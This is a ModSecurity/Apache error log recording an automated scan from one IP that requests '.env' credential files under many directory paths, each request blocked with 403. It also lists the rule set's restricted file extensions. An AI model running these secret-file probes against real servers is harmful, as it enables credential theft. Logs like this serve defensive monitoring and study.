[Wed Feb 19 05:52:41.345434 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJwAAAAk"]
[Wed Feb 19 05:52:41.345876 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJwAAAAk"]
[Wed Feb 19 05:52:41.371335 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwKAAAAAk"]
[Wed Feb 19 05:52:41.371738 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwKAAAAAk"]
[Wed Feb 19 05:52:41.372254 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwKAAAAAk"]
[Wed Feb 19 05:52:41.399236 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwKQAAAAk"]
[Wed Feb 19 05:52:41.399604 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwKQAAAAk"]
[Wed Feb 19 05:52:41.400041 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwKQAAAAk"]
[Wed Feb 19 05:52:41.427376 2025] [authz_core:error] [pid 1259335] [client 193.41.206.98:47872] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Wed Feb 19 05:52:41.452539 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwKwAAAAk"]
[Wed Feb 19 05:52:41.452751 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwKwAAAAk"]
[Wed Feb 19 05:52:41.452987 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwKwAAAAk"]
[Wed Feb 19 05:52:41.478028 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLAAAAAk"]
[Wed Feb 19 05:52:41.478415 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLAAAAAk"]
[Wed Feb 19 05:52:41.478812 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLAAAAAk"]
[Wed Feb 19 05:52:41.504463 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLQAAAAk"]
[Wed Feb 19 05:52:41.504956 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLQAAAAk"]
[Wed Feb 19 05:52:41.505521 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLQAAAAk"]
[Wed Feb 19 05:52:41.530793 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLgAAAAk"]
[Wed Feb 19 05:52:41.531169 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLgAAAAk"]
[Wed Feb 19 05:52:41.531636 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLgAAAAk"]
[Wed Feb 19 05:52:41.556989 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLwAAAAk"]
[Wed Feb 19 05:52:41.557393 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLwAAAAk"]
[Wed Feb 19 05:52:41.557847 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwLwAAAAk"]
[Wed Feb 19 05:52:41.583253 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwMAAAAAk"]
[Wed Feb 19 05:52:41.583631 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwMAAAAAk"]
[Wed Feb 19 05:52:41.584061 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwMAAAAAk"]
[Wed Feb 19 05:52:41.609790 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.project"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "Z7VjmYC8jifnO0kJgZgwMQAAAAk"]
[Wed Feb 19 05:52:41.610193 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "Z7VjmYC8jifnO0kJgZgwMQAAAAk"]
[Wed Feb 19 05:52:41.610687 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "Z7VjmYC8jifnO0kJgZgwMQAAAAk"]
[Wed Feb 19 05:52:41.637704 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwMgAAAAk"]
[Wed Feb 19 05:52:41.638081 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwMgAAAAk"]
[Wed Feb 19 05:52:41.638584 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwMgAAAAk"]
[Wed Feb 19 05:52:41.664805 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwMwAAAAk"]
[Wed Feb 19 05:52:41.665196 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwMwAAAAk"]
[Wed Feb 19 05:52:41.665657 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwMwAAAAk"]
[Wed Feb 19 05:52:57.213116 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z7VjqbfTDZoQXGqhAzbFqgAAAAc"]
[Wed Feb 19 05:52:57.213416 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z7VjqbfTDZoQXGqhAzbFqgAAAAc"]
[Wed Feb 19 05:52:57.213776 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z7VjqbfTDZoQXGqhAzbFqgAAAAc"]
[Wed Feb 19 05:52:57.214306 2025] [:error] [pid 1259202] [client 193.41.206.98:35086] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "Z7VjqbfTDZoQXGqhAzbFqgAAAAc"]
